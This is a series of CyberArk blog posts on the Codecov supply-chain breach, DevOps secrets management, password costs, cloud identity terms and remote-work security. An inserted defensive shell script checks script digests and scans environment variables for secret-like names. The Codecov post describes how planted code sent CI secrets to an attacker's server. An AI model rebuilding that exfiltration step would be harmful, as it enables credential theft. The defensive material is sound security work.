“In this virtual war room, people get a very realistic perspective of what they’re up against,” he says. “We see the moment of clarity when they sit down and with four lines of code, they’ve performed a devastating Golden Ticket attack, for example. The look in their eyes says, ‘I get it, I understand this is not witchcraft.’”

What started out as a workshop has grown into a global multi-track series offering a range of attack simulations and defensive countermeasures – in the cloud, on the endpoint, across the DevOps pipeline, and more.

Biohackers: The Invisible Threat

This training is helping security professionals stay a step ahead of attackers. But what happens when they come up against someone who is both the attacker and the attack vector?

What if a rogue employee on a mission to take down the company goes as far as biohacking their own body, implanting an RFID microchip that unlocks physical doors to company buildings and secretly stores and pilfers out sensitive data and files? Or, potentially worse, someone who conceals an entire Linux system beneath their skin, passes every physical and digital security check, and makes off with your most valuable corporate assets?

It may sound like futuristic science fiction, but it’s reality today, Noe warns, and something security teams must absolutely pay attention to. And he, of all people, would know. You see, it’s never been enough for him to just study cutting-edge cyber defense; he believes he must live it. Over the past several years, Noe has undergone a series of bio-implant procedures to “become more than human” and along the way, delve deeper into the mind of an attacker.

His personal biohacking journey and long cyber career make Noe uniquely qualified to explore the collision between human augmentation and cyber warfare. And on May 19 he’ll take to the virtual RSA Conference stage to do just that. His highly anticipated talk “Biohackers: The Invisible Threat” will outline the past, present and future state of biohacking and bioimplants; demonstrate how compromising contactless technologies can threaten physical and digital security; and help security professionals prepare for this new frontier.

As our own talk with Noe wound down, we asked him how someone so deeply entrenched in the attacker’s psyche stays on the straight and narrow. Noe says he’s happy to call himself a white hat, fulfilled by helping others defend against evolving threats, and doing work that he and his family can be proud of. And since he said it himself, we’ll close with this shameless plug: “The fact that I’m working for a security company that I actually believe in makes it really easy to be on the good side.”


Editor’s Note: Learn more about Noe’s RSA Conference presentation by reading this Archer News article, Biohacker shows how hand implant attacks can work, and watching this video interview. 

Breaking Down the Codecov Attack: Finding a Malicious Needle in a Code Haystack https://www.cyberark.com/blog/breaking-down-the-codecov-attack-finding-a-malicious-needle-in-a-code-haystack/ Wed, 28 Apr 2021 11:30:24 +0000 https://www.cyberark.com/?p=117293 Codecov Breach Deconstruction

Earlier this month, San Francisco-based technology company Codecov discovered that attackers had compromised its software platform — used by more than 29,000 customers worldwide to test software code — in the latest digital supply chain attack to make headlines. While that was troubling enough, there was an added hitch. Although the attack was identified and reported in April, the tampering reportedly started back in January. And it may have continued undetected had it not been for some astute observations by a customer.

The ripple effects and long-term ramifications of this attack have not yet been determined, and investigation is still ongoing. However, based on reports, we can examine the Tactics, Techniques and Procedures (TTPs) used by attackers to place a needle in a haystack of code, surreptitiously infect Codecov’s CI/CD pipeline and potentially gain access to thousands of customer networks. What’s clear is that this attack, like so many before it, followed a familiar path: target and steal credentials to get to the intended target.

The Codecov Breach

Codecov produces an array of code testing software, and the software that was reportedly impacted during this attack was made specifically for CI/CD pipelines. When developers at a customer organization finish testing, they will often download a script directly from Codecov’s servers, which will check the code coverage of the testing apparatus. It will then report back to Codecov’s servers.

An online statement by Codecov details the initial breach discovery: “On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.”

This uploader tool works with popular development platforms like GitHub. They use secrets and other credentials that enable interaction between applications and other tools in the CI/CD pipeline, along with access to cloud resources.

After gaining a foothold and obtaining the necessary credentials, the attackers created a backdoor by hiding a single line of malicious code within the approximately 1,900 lines of code that made up the uploader. They did so with relative ease, as two-factor authentication was not required to access the uploader, according to reports.

Each time a developer downloaded the Codecov testing script, the malicious software would begin running on the customer organization’s test machines. This allowed the attackers to export the secrets, credentials and other sensitive data stored in the victim’s continuous integration environments and send them to an attacker-controlled server outside of the customer’s infrastructure.

The particulars of this attack share commonalities with the large-scale SolarWinds breach and present an interesting perspective on the CI/CD pipeline and how efforts to protect these dynamic environments often fall short. The Codecov supply chain attack was clearly designed to exploit weaknesses and scale its efforts for maximum impact. It took advantage of the fact that Codecov’s script was an unusually large one, based heavily on environment variables — sets of dynamic name-value pairs used by Linux and Windows operating systems — that often contain hard-coded API keys, database credentials and more. These secrets are stored and used heavily within CI/CD pipelines. And because there is often very limited security oversight around how they are managed and protected, these secrets are easy targets for attackers who pinpoint and harvest them.

For months, the attackers apparently had code execution access into each and every system that was using the Codecov script. They avoided arousing suspicion by hiding the malicious code inside a larger code series — and by concentrating their efforts on those environment variables. Based on the line of script the attackers used — one that specifically centers on sending Git repository URLs to the attacker-controlled server — it appears that GitHub was the focus.

The Discovery

It’s not abnormal for an organization to consider code downloaded from a business partner to be trustworthy, and so customers don’t always pay much attention to the granular details of the code, such as its digital fingerprint. The fact that Codecov attaches a signature to its proprietary code, however, is ultimately what led to the discovery of the attack, months after the initial breach. When the signature on one machine didn’t match up to that on another, a red flag was sent up by a customer and the attack revealed. Had the attackers changed the code signature, they might well have been able to operate unnoticed for an indefinite amount of time.

The Takeaway

Development environments are complex, with numerous places where secrets and credentials can be, and often are, inadvertently exposed. For example, while code repositories such as GitHub are an essential part of the development process, credentials can be inadvertently exposed when code is made public, and compromised credentials can allow attackers to include malicious code within the builds. An organization’s code and intellectual property can be tampered with or stolen from repositories if credentials are compromised.

While there is no one vendor or tool that can completely prevent digital supply chain attacks like this from happening, there are steps organizations can take to strengthen their security postures and minimize risk:

Perform Code Signature Checks. By simply checking the software’s digital fingerprint to verify its integrity, the “dwell time” of this attack could have been limited to mere days or even hours, rather than months.

Mandate Multi-Factor Authentication (MFA). By looking at this attack process from the attackers’ point of view, the Codecov breach was made a lot simpler because they didn’t need a second authentication factor or another piece of approval to insert their code.

Do Not Store Credentials and Secrets in Environment Variables. The reasons are numerous: most notably, it is extremely hard to track usage of environment variables, as they are passed down to child processes that allow for unintended access and break the principle of least privilege. Instead, if an application requires a secret be handed over in an environment variable, use a secrets manager to help ensure only authenticated users get access to the clear text secrets.

Implement Threat Detection Capabilities. CI/CD pipelines are highly automated, which means there is little human interaction, making it easier for attackers to fly under the radar. Having threat detection capabilities in place could help detect anomalies and potential breaches more easily and earlier.
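As an added example (not code from Codecov, CyberArk or this post), the shell functions below put the first takeaway into practice, with the third and fourth alongside: a CI job pins the SHA-256 of a downloaded helper script, refuses to run it on a mismatch while emitting an alert line a detection pipeline can key on, and audits which exported variables a child script would inherit. The file names, the stand-in uploader and the DEMO_API_TOKEN variable are constructed samples.

```shell
#!/usr/bin/env bash
# Added example, not Codecov's or CyberArk's code.  Pin the digest of a
# downloaded CI helper script, refuse to execute it on a mismatch, and audit
# which exported variables a child script would inherit.  File names, the
# stand-in uploader and DEMO_API_TOKEN are constructed samples.  The expected
# digest must come from a trusted place (pinned in the repo or the vendor's
# separately published checksum file), never from the server serving the script.
set -eu

# sha256_of FILE: hex SHA-256, using whichever digest tool the runner has.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | awk '{print $1}'
  else
    openssl dgst -sha256 "$1" | awk '{print $NF}'
  fi
}

# verify_script FILE EXPECTED_DIGEST
# Returns 0 when the digest matches.  On mismatch it writes one
# machine-readable ALERT line to stderr (easy to pick out of CI logs or a
# SIEM) and returns 1.  Nothing is executed by this function.
verify_script() {
  local file="$1" expected="$2" actual
  actual="$(sha256_of "$file")"
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  printf 'ALERT integrity_mismatch file=%s expected=%s actual=%s\n' \
    "$file" "$expected" "$actual" >&2
  return 1
}

# run_verified FILE EXPECTED_DIGEST: the CI step.  Execute only after the
# check passes; a single altered line anywhere in the script fails it.
run_verified() {
  verify_script "$1" "$2" || return 1
  sh "$1"
}

# inherited_secret_names: exported variables that any child process (such as
# a downloaded uploader script) would see and whose names look like secrets.
# Run it as an audit step before invoking third-party scripts in a job.
inherited_secret_names() {
  sh -c env | awk -F= '
    /^[A-Za-z_][A-Za-z0-9_]*=/ && $1 ~ /(TOKEN|SECRET|PASSWORD|API_KEY|CREDENTIAL)/ {
      print $1
    }' | sort -u
}

# demo: constructed walk-through.  The "uploader" is a harmless stand-in and
# the tampering is a harmless appended line, which is enough to change the digest.
demo() {
  local work pinned
  work="$(mktemp -d)"
  printf '#!/bin/sh\necho "uploading coverage report"\n' > "$work/uploader.sh"
  pinned="$(sha256_of "$work/uploader.sh")"   # digest recorded at review time

  echo "--- clean script"
  run_verified "$work/uploader.sh" "$pinned"

  echo "--- tampered script (one line appended)"
  printf 'echo "unexpected extra line"\n' >> "$work/uploader.sh"
  if run_verified "$work/uploader.sh" "$pinned"; then
    echo "BUG: tampered script was executed"; rm -rf "$work"; return 1
  fi
  echo "refused to execute: digest changed"

  echo "--- secret-like variables a child script would inherit"
  DEMO_API_TOKEN=example; export DEMO_API_TOKEN   # constructed, not a real secret
  inherited_secret_names
  unset DEMO_API_TOKEN
  rm -rf "$work"
}

demo
```

In a real job the pinned digest lives in the repository (or is fetched from the vendor's published checksum file) so that a change to the served script, however small, stops the build instead of running inside it.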

Finally, with cybersecurity, most things boil down to effective and consistent communication. Developers simply don’t always have the awareness of inherent security issues along CI/CD pipelines, nor do they often have a clear sense of what their tools are actually doing with credentials and secrets. Making the dangers of vagueness and ambiguity clear to developers is a core part of Shift Left, and it’s an important — if not always welcome — way forward to more stringent security.

Developers may sometimes look at security specialists as just one more layer that makes their jobs harder. But there’s obviously a compelling need for this important layer. And while putting in the time and effort to clearly identify the risks involved and the measures needed to mitigate them may mean extra steps now, it could very well result in fewer security headaches later.

Codecov Breach Learning: Engage Developers to Protect the DevOps Pipeline https://www.cyberark.com/blog/codecov-breach-learning-engage-developers-to-protect-the-devops-pipeline/ Thu, 22 Apr 2021 11:56:02 +0000 https://www.cyberark.com/?p=117149 Codecov Breach Secure DevOps Pipeline

Regardless of what industry you’re in, software is a driving force behind digital innovation. But what happens when the software your organization builds and uses to innovate isn’t secure? It’s a question that many organizations and government agencies are grappling with as they examine their development environments and digital supply chains post-SolarWinds — and with even more urgency since the recent Codecov breach.

This month, Reuters reported that attackers infiltrated code coverage reporting solution provider Codecov and by manipulating one of its software development tools gained access to hundreds of organizations’ networks. This breach, with the potential for far-reaching and yet-unknown impact, reinforces the fact that development environments, including continuous integration/continuous delivery (CI/CD) pipelines, are vulnerable to targeted attacks. To minimize risk, it is imperative that security teams “shift left” and become fully embedded into the software development process — from the very first planning discussion to coding and all the way through production.

Who’s Keeping Your Secrets Safe?

ZDNet reports that DevOps adoption has almost doubled in the last five years and since COVID-19.

As DevOps adoption accelerates, developers and IT teams are relying heavily on automation and cloud services to code faster and accelerate software releases. While critical, these advancements increase the attack surface by introducing new credentials and secrets that are exceptionally powerful and highly susceptible to compromise, including those used:

  • On developer workstations and laptops to write code, build, test, provision, run and operate applications
  • By applications, scripts, and other non-human identities to communicate with other applications and tools, as well as to securely access databases and other sensitive resources
  • By human users to access DevOps tool administrative consoles, as well as cloud consoles

Unfortunately, too often organizations don’t fully recognize the extent to which these secrets are being used in their DevOps environments or how effectively these secrets are being secured across code repositories and the entire software development lifecycle (SDLC). Why is that?

The Great DevOps Security Divide

In some organizations, this is because “ownership” of secrets management — from requirements to platform selection and operations — isn’t clearly defined. Instead, secrets management decisions are happening at multiple levels: 46% companywide, 30% at the business/division level, and 24% at the project team level, according to a CyberArk survey. This lack of clarity and project-level vs. holistic approach to security leaves gaps that lead to problems as DevOps adoption increases and applications move to production.

Additionally, developers are inadvertently — or deliberately — taking on more direct security responsibilities, either because security is not aware or not yet involved with the project. In this case, developers are often making the secrets management decisions early in the development process without fully understanding the risks and requirements — and without involving the security team until it’s too late, often when code is already in production.

Fundamentally, development and security teams have very different priorities. Security is charged with reducing risk and defending the organization from attacks, while development is focused on delivering software innovations on tight release schedules. Without security’s involvement, development teams tend to make decisions that prioritize speed over security. This could mean taking risky shortcuts such as relying on the DevOps tool’s native security capabilities, using code repositories without securing credentials, or worse — hard-coding privileged credentials directly into code — or simply ignoring security altogether.

If not secured, the credentials and secrets used across the DevOps pipeline become easy — and valuable — targets for attackers. CI/CD pipelines and other DevOps tools are Tier Zero assets: access them and you get more credentials. With compromised credentials, attackers can take confidential data, inject malware into the codebase, or steal code and valuable IP from repositories.

What’s more, when secrets management isn’t addressed throughout the process, security has to jump in to confront issues at the eleventh hour — sometimes right before code is scheduled to go into production — putting deployments on hold until security issues are resolved. Developers feel the pain of last-minute code changes, which are costly and frustrating for everyone involved.

Shift Left to Embed Security from the Start

To reduce risk and accelerate innovation, organizations embed security into development and operations practices from inception to deployment. This concept, commonly known as “shifting left,” requires security teams to engage with developers from the very beginning of the development process, breaking down silos and working together to make critical security decisions. This means developers can avoid rework and delays later in the lifecycle. And by making it easy for developers to secure their application credentials and secrets, security teams can reduce objections, increase adoption and accelerate development cycles.

While many organizations recognize the value of embedded security, moving from idea to action can be challenging. Today, only 41% of security and DevOps teams report that security is integrated throughout the application development process, according to our research. There are numerous reasons for this — especially when it comes to secrets management. For example, our research found 60% of developers believe security teams lack the necessary technical expertise.

How Can Security Shift Left and Better Engage Developers?

Now more than ever, it is critical that security and development teams come into alignment to protect their DevOps environment and digital supply chain. Yet while security teams know they need to engage with developers, changing mindsets and cultural practices takes time, and getting started can be half the battle.

Our new guide, “Six Practical Approaches to Engage Developers and Improve DevOps Security,” provides enterprise security teams with pragmatic approaches for creating a security-first culture, strengthening bonds, and engaging with developers, including:

  • Introducing self-service models that make securing application credentials easy for developers
  • Running cross-educational workshops on specific use cases and digging into developer concerns and how to address them
  • Encouraging developers to think like attackers by providing training on common attack vectors and hands-on demonstrations
  • Embracing Agile and DevOps methods within security processes
  • Demonstrating “quick wins” to make an immediate impact, quickly show value, and establish credibility

For broader guidance on securing development environments and the software supply chain, read “Securing Privileged Access in Development Environments – Three Critical Use Cases.”

Between a Rock and a Hard Place: The IT Help Desk Manager’s Password Dilemma https://www.cyberark.com/blog/between-a-rock-and-a-hard-place-the-it-help-desk-managers-password-dilemma/ Tue, 20 Apr 2021 13:00:14 +0000 https://www.cyberark.com/?p=117110 IT Help Desk Password Support

Long-time Saturday Night Live fans will likely remember Nick Burns – a.k.a. “your company’s computer guy” – a popular recurring character played by Jimmy Fallon in the early 2000s.

Sporting a pocket protector and blaring pager, Nick makes his way around a large corporate office, fielding IT support questions and sarcastically mocking his technically “inept” customers – internal company employees – who could never get the printer to work and didn’t understand JavaScript jokes. No skit was complete without his signature phrases of “MOOOOVE” as he swoops into their workstations to fix a problem, and “Was that so hard?!” after he solves it within seconds.

While Nick’s character is a far cry from the business-critical role of today’s IT help desk manager, many in this position today can relate to the daily barrage of support tickets he faced. And even those with the sunniest of dispositions sometimes share his frustration in dealing with the same issues again and again. Most of the time, those issues can be traced back to passwords.

“Alright, one at a time. My brain doesn’t have a zip drive!”

While Nick’s days of Outlook 6.0 and LC-475 Macs with 32-bit processors are long gone, passwords are still alive 20 years later, and relied upon by organizations to authenticate corporate users.

As the pace of digital innovation accelerates, many organizations are adopting new technologies at a dizzying pace. Every new corporate application or tool becomes a new identity silo, with unique password management requirements, such as complexity and rotation cadence.

Requiring corporate users to repeatedly authenticate themselves to these new systems – and maintain (let alone remember!) numerous complex passwords – creates headaches galore for help desk professionals. Not only charged with provisioning users, they also manage hundreds (if not thousands) of corporate accounts – and the constant password reset requests and account lockouts that come with them.

Let’s use some industry estimates and simple calculations to quantify this massive password problem:

  • The “all-in” cost of an average help desk call to reset a password is between $40 and $50: we’ll use the mean of $45.
  • It’s estimated that each corporate user contacted the help desk with six to ten password-related issues per year before COVID-19 sent many workers home. So, eight issues spanning a typical year of 261 eight-hour working days, or 2,088 hours. In other words, one password issue is flagged to the help desk for every 261 hours of work.
  • Now consider that the typical work day for U.S. knowledge workers has lengthened from eight to 11 hours since the widespread shift to remote work. That means 261 11-hour working days, 2,871 hours total – or 783 hours more than “usual.” It also translates to three additional password-related help desk issues per person.
  • Based on this data, CyberArk estimates that for a large enterprise of 1,000 employees, $495,000 is spent annually resolving password issues. (11 password-related help desk requests per person x $45 per request x 1,000 users.) 

Instead of focusing on strategic business initiatives, already time- and resource-constrained IT help desk managers are pulling even longer shifts to address password issues, meet service level agreements (SLAs) and deal with frustrated end users.

“Don’t tell me your password is your dog’s name… Mooooooove!”

It’s old news that humans are terrible at selecting strong passwords. The ones they choose are often overly simple, common, reused or shared. In fact, employees reuse passwords across an average of 16 corporate accounts. While it’s tempting to look to password managers to solve this challenge, this approach is not without risk. Plus, password managers can’t manage who gets access to what sensitive resources, and for how long.

Attackers know that many organizations still rely on just one verification method – like a single set of credentials – to protect access to various systems and tools. This is especially dangerous when used in combination with single sign-on, which allows broad access to many systems and applications.

They know that all they have to do is steal or compromise credentials for one corporate identity (any one will do) to gain a foothold and then escalate privileges toward high-value resources. Today, 67% of all breaches are caused by credential theft (using stolen or weak passwords) and social attacks.

Yet when IT teams implement stronger authentication methods in the name of security, workers often develop clever ways to circumvent these controls – or avoid using company approved systems and applications altogether to stay productive.

Eighty-four percent of IT service management professionals believe working in IT will continue to get harder over the next three years. And it makes sense why – as they find themselves stuck between a rock (keeping all systems and data as secure as possible) and a hard place (keeping teams productive).

Instead of resetting that password… again… consider retiring it altogether

By embracing a Zero Trust security model that integrates solutions such as passwordless authentication methods, forward-looking IT security and help desk teams can strike the right balance and take back some control.

By layering cloud-based single sign-on (SSO) with adaptive multi-factor authentication (MFA), these teams can overcome pervasive password challenges and make sure users are who they say they are – while giving them fast, responsive and streamlined access to everything they need.

This is where a bit of intelligence and context in the form of risk-based access comes in. Using machine learning and contextual signals, including user data, device data and activity data, organizations can automatically analyze access requests against historical patterns, assign risk to each login attempt and create access policies triggered by anomalous behavior.

What’s more, by giving workers self-service opportunities, IT help desk teams can lighten their own workloads, automate time-consuming tasks and refocus their efforts on high-impact work that keeps the business operational and profitable.

As Nick Burns would say in his classic parting shot, “Oh, by the way… you’re welcome!”

Cloud Identity and Access Management Alphabet Soup: A Definitive Guide https://www.cyberark.com/blog/cloud-identity-and-access-management-alphabet-soup-a-definitive-guide/ Thu, 15 Apr 2021 13:00:06 +0000 https://www.cyberark.com/?p=116939 Identity and Access Management (IAM) Guide

Successful digital transformation depends on the security of your cloud environment. Modern organizations recognize the importance of securing identities in the zero-perimeter, Zero Trust world of remote work and cloud-hosted data. But this is, of course, easier said than done, as the number, types, and interrelationships of identities massively expand across cloud environments.

It’s largely understood that cloud security is a shared responsibility between cloud provider and customer. But when exploring appropriate Identity and Access Management (IAM) controls for these environments, many organizations grapple with questions like: When are cloud-native tools sufficient, and when should we consider specialized solutions from other vendors?

It can be tricky to tell with all of the IT security jargon floating around (we security folks do love our acronyms). If you’ve ever found yourself stuck in this IAM alphabet soup, unable to differentiate between solution categories or pinpoint the optimal mix of controls for your organization’s cloud workloads, this definitive guide to cloud IAM acronyms is a good place to start.

Identity and Access Management (IAM): Identity and Access Management is a framework of controls and policies used to create, manage and secure identities – both human and non-human – and their permissions to access systems and resources.

IAM services offered by cloud providers, such as authentication, authorization, and encryption, are foundational security components in cloud environments. They allow customer organizations to centrally manage and granularly control access across their cloud estates.

Each cloud service provider provides its own IAM paradigms with distinct definitions of entitlements to access resources. Whether a provider uses the term “entitlements,” “permissions” or “privileges” to define access rights – IAM platforms help cloud security teams manage who can access what. On each platform, organizations build IAM policies that grant access entitlements to their identities.

While terminology varies regarding user types, platforms generally define identities as users, groups, and roles. A user is a single individual account. A group is a structure to manage several users that have similar responsibilities and require similar permissions. A role is a distinct identity that has permissions to perform a specific function. Often, roles are assumed by individual users to complete a given task.

It’s important to note that in the cloud, traditional designations of privileged access do not necessarily apply; generally speaking, any human or machine identity can be assigned permissions to access sensitive data and resources.

Role-based Access Control (RBAC): RBAC is a popular model for authorizing users that assigns permissions based on job function, in adherence to the rule of least privilege. RBAC is a tried-and-true authorization model that is widely adopted both on-premises and in cloud environments, most notably in Azure, where RBAC is a primary structure for organizations to manage entitlements to access Azure resources and services.

Attribute-based Access Control (ABAC): ABAC is a variation of the RBAC paradigm for user authorization popular on AWS. In an ABAC model, organizations can architect their permissions to access cloud resources in anticipation of future needs. Organizations classify their resources and assign common types of workloads with common tags. Certain identities can then be granted permissions to access all resources with this tag. This approach eliminates the need to manually provision access to new resources, but it also can make it difficult to enforce least privilege access if organizations take a broad, one-tag-fits-all approach to labeling their resources.

Access Control Lists (ACLs): ACLs are a control that allows organizations to create lists of users that can access specific cloud resources, most commonly virtual machine (VM) infrastructure. This permissions construct provides fine-grained control from a resource-centric view.

Single Sign-On (SSO): SSO solutions provide a centralized portal where users can access cloud workspaces and applications without remembering and entering passwords. Today, employees often have more credentials than they know what to do with. SSO controls provide quick, reliable access and eliminate the security risks of insecure or re-used passwords set by employees. They also eliminate the time and labor costs of IT teams resetting passwords.

Multi-Factor Authentication (MFA): MFA solutions verify the identity of users accessing cloud platforms or applications with additional factors such as a phone call, email or mobile push notification. Just as in on-premises apps, using MFA provides an additional layer of security for access to applications and sensitive resources and is widely considered a security best practice. Adaptive MFA, in which the method of authentication corresponds to the sensitivity of a given resource, is also growing in popularity.

Key Management Service (KMS): KMS offerings from cloud providers allow customers to create and manage the cryptographic keys that encrypt data and control their use across cloud services and workloads.

Cloud Access Security Brokers (CASBs): CASBs sit between users and cloud services to enforce enterprise security policies on cloud-based services. In effect, CASBs are “checkpoints” or “gateways” that govern and secure access to cloud services. CASBs are primarily used to protect SaaS application deployments and are particularly well-suited to detection of sensitive data in transit.

Cloud Workload Protection Platforms (CWPP): CWPPs help organizations protect the application workloads that run in their IaaS environments. As cloud-native DevOps becomes increasingly popular, key CWPP functions like system hardening, container protection, and vulnerability management become increasingly important for securing cloud-native applications.

Cloud-Native Application Protection Platforms (CNAPP): CNAPP is an emerging category of solutions that analyze application and data context to protect cloud-native applications and their hosts, whether virtual machines (VMs), containers, or serverless functions.

Cloud Security Posture Management (CSPM): CSPMs address risks of compliance violations and misconfigurations in enterprise cloud environments. CSPMs focus on the resource level to identify deviations from best practice security settings for cloud governance and compliance.

Cloud Infrastructure Entitlement Management (CIEM): CIEM solutions provide granular detection and management of risky IAM permissions. Organizations that rely on cloud-native IAM tools can quickly lose visibility and control of unused and misconfigured permissions to access resources like infrastructure, applications, and serverless functions. This is even more difficult in multi-cloud deployments with siloed toolsets and entitlements definitions. CIEM solutions provide cloud-agnostic, granular detection and remediation of permissions that violate least privilege and allow organizations to defend against internal and external threats.

Don’t get lost in cloud IAM alphabet soup. Bookmark this page and refer back often.

And if you’re looking for ways to clean up permissions sprawl and protect identities across your cloud estate, give our CIEM solution – CyberArk Cloud Entitlements Manager – a free test drive. With no infrastructure needed, you’ll be up and running in about an hour so you can start rapidly reducing risk on day one.

It’s Identity Management Day: 16 Stats from the New Cybersecurity Battleground https://www.cyberark.com/blog/its-identity-management-day-16-stats-from-the-new-cybersecurity-battleground/ Tue, 13 Apr 2021 12:00:56 +0000 https://www.cyberark.com/?p=116620 Identity Management Day

Today is Identity Management Day – a U.S. awareness initiative presented by the National Cybersecurity Alliance and the Identity Defined Security Alliance (IDSA). In the midst of a dramatic technological and economic shift, this push to educate business leaders, IT decision makers and the general public about the importance of managing and securing identities comes at the perfect time.

All Roads Lead to Identity

Nearly every organization is on the transformation path to becoming more mobile, more digital, and more cloud-centric – all while supporting distributed workforces. They also face the challenge of an ever-expanding attack surface as the number, types, and interconnectedness of identities multiply across business applications and cloud workloads.

Every identity – whether customer, remote worker, third-party vendor, device, or application – requires an entry point into the modern enterprise. And the credentials linked to any identity can become privileged under certain conditions, unlocking higher levels of access and creating an attack path to an organization’s most valuable systems and assets.

Attackers understand the opportunity: the easiest way to establish a foothold in any environment is to steal credentials through phishing, social engineering, or malware. It’s why a vast majority of breaches involve lost, stolen, or compromised credentials.

Yet traditional approaches to security are increasingly ineffective as the unstoppable march toward digital transformation dissolves the barriers put up to separate the “trusted” from the “untrusted.”

Here are 16 reasons why identity has become the new cybersecurity battleground, and in turn, the only practical control plane.

Identity Management and Security Stats

Identity Security: A Privilege-led Approach

Securing identities – within business applications, from hybrid to multi-cloud workloads and throughout the DevOps pipeline – requires a new approach rooted in privileged access.

Identity Security follows a Zero Trust model to authenticate every identity accurately, authorize each identity with the proper permissions and provide access for that identity to privileged assets in a structured manner – all in a way that can be audited or accounted for. Identity Security also enables organizations to secure access across any device, anywhere, at just the right time – so they don’t have to choose between security and productivity.

Learn more about Identity Security and brush up on identity and access management best practices with these #IDMgmtDay resources:

6 Simple Remote Work Security Mistakes and How to Avoid Them https://www.cyberark.com/blog/6-simple-remote-work-security-mistakes-and-how-to-avoid-them/ Fri, 09 Apr 2021 13:00:24 +0000 https://www.cyberark.com/?p=116594 Remote Work Cybersecurity Mistakes

Since the COVID-19 outbreak, there have been countless headlines and viral social media posts exposing some of the worst remote security faux pas, ranging from the financially devastating to the easily avoidable to the outright strange. More than a year later, some people are still struggling to master their mute button — let alone take precautions to protect their digital identities or safeguard work-related information — and attackers have ways of getting even the most security-conscious employees to slip up.

At the height of the pandemic, 42% of the American labor force worked from home, according to a study conducted by Stanford Research, and one in four will continue to do so through 2021, according to a December 2020 Upwork study. While many will return to the office once it is safe to do so, the Upwork study found that nearly 23% of workers are expected to be remote in five years — or nearly double the pre-pandemic percentage.

The days of everyone working onsite from company-issued PCs seem like ancient history. This January, Fortune reported that sales of laptop and desktop computers exceeded 302 million units in 2020 — the highest they’ve been in six years. Many of those devices are now connected to company networks. They’re also being used by remote learners, virtual gamers, and online shoppers; and attackers are taking advantage.

In fact, a recent study commissioned by Microsoft Ireland found that 26% of remote workers had personally experienced a cyber attack. The study also found that 36% of employers were forced to pivot to a remote work setting quickly as a result of the pandemic and are still working to implement the security, privacy, and workplace procedures that are necessary to secure this new environment.

“We don’t have the same corporate hygiene at home, and we’re actually expanding the footprint of our corporate network from an attack perspective because there aren’t as many security controls around it,” explains Bryan Murphy, director of consulting services at CyberArk and leader of our remediation services team.

Training and educating employees about cybersecurity risks is one of security leaders’ top operational challenges today, and as record numbers of people continue to work outside office walls, the need for vigilance and attention to security has never been greater. Here are a few of the most important remote work faux pas to avoid:

1. Using Weak Passwords

Cybersecurity and IT professionals have long stressed the importance of using unique, secure, complex, and random passwords, especially when it comes to sensitive materials. Unfortunately, studies suggest that those warnings aren’t always taken seriously. Users tend to use simple, easy-to-remember passwords at the expense of their own security. In fact, according to a CyberArk study, 82% of remote workers admit to reusing passwords.

“If you use the internet, consider using a personal password manager so that every site has a unique password – that’s first and foremost,” says Murphy, who himself has more than 600 unique and complicated passwords stored in his password manager.

Murphy explains that it’s also important to use biometric and two-factor authentication on all websites and applications for an added layer of protection.

Of course, if you’re responsible for managing access on the scale of a business, password managers are not enough to protect you. That’s where privileged access management can help.

2. Taking Risky Security Policy Workarounds

Cybersecurity practices can sometimes feel overburdensome, and over the course of a busy workday, remote workers may be tempted to find workarounds that increase productivity at the expense of security.

According to the same CyberArk study, 67% of respondents admit to seeking a workaround to corporate security policies, such as sending work documents to their personal email address, sharing passwords, or installing unverified applications on their work devices.

One major risk many take for the sake of convenience is storing passwords in their browser, but Murphy warns that allowing passwords to autofill is risky.

“The password manager in your browser is a common place where attackers look for credentials — whether personal or corporate, it doesn’t matter — they look there all the time,” he says. “There’s a configuration setting in Chrome or Safari, for example, the ‘don’t save passwords’ option, and generally in corporate environments they automatically turn that on so it never lets you do it, but at home people just do it for convenience.”

Remote workers may attempt to sidestep these controls for various reasons, including convenience and ease of use, without fully understanding the downstream consequences if credentials are exposed. While taking shortcuts may seem harmless, these security protocols are in place for a reason – and ignoring them can have real consequences.

3. Sharing Devices with Family

Being stuck at home has made it tempting for remote workers to let family members use their work computers for non-work-related activities.

“Because it’s so chaotic right now, the work device becomes the personal device — like, my children need to use Zoom so just sit at my desk and do it,” says Murphy. “It’s not that there’s a vulnerability or a flaw within Zoom, but using an unfamiliar device could open up the possibility that your child clicks a link or goes to an unknown website. So it all comes back to the separation of work and personal use, and we’re blurring that line too often.”

Letting a family member use your employer-issued devices can expose the entire corporate network to significant risk and general confusion. Case in point? One unlucky lawyer discovered the perils of lending work computers to others and accidentally showed up to a virtual court session as a cat in a widely shared viral video.

Sharing a work device with others is never a good idea, and if you want to use your home internet connection for work-related tasks, Murphy recommends taking a few simple precautions to keep work and personal data separate and secure. First, he suggests creating a guest WiFi network separate from the standard home network for work-related activities. “Generally, the guest network isolates all the devices, so they can’t communicate with one another,” he says. “That effectively puts a firewall around it so you can only communicate out, not in.”

Murphy also recommends creating a separate, password-protected user account with restricted access for web browsing and day-to-day related activities.

4. Ignoring Common Attack Signs and Symptoms

When an attack is being perpetrated or attempted there are a number of common signs and symptoms that can act as an early warning signal. Employers should strive to educate their remote workers on what to look out for and how to identify a potential breach.

“When you start to see the browser getting modified, and you didn’t do it, that’s a red flag for sure,” says Murphy. “Pop-ups are a big one, or your default browser is changed, or you have a bunch of things open in your browser you didn’t open yourself.”

Other signs and symptoms include loss of control of the keyboard or mouse, applications or files appearing that weren’t intentionally downloaded, and sudden unexplained system slowdowns. Don’t ignore these symptoms — if you feel there are unauthorized changes to your system, follow your company procedures. End user awareness is key — say something, even if it appears minor. After all, it could be an early warning sign of something much bigger.

5. Giving Vendors and Contractors Too Much Access

Most employers depend on vendors and contractors, and those external contributors often require a certain degree of access in order to provide their services.

It’s important for IT security teams to follow the principle of least privilege — limiting each user’s access to only what is needed, for only as long as it is needed. And this doesn’t just apply to third parties — Zero Trust approaches require every identity (human or machine) to be authenticated and authorized before access is granted.

“When you think about that remote workforce, it’s not enough to say we have to protect our people, it’s also the third-party vendors that might have different access and security controls and need to be managed, monitored and controlled just like regular employees,” says Murphy.

Organizations should require vendors and contractors to adhere to the same security practices and standards as the rest of their workforce, he notes.

6. Hitting “Remind Me Tomorrow” on Software Updates

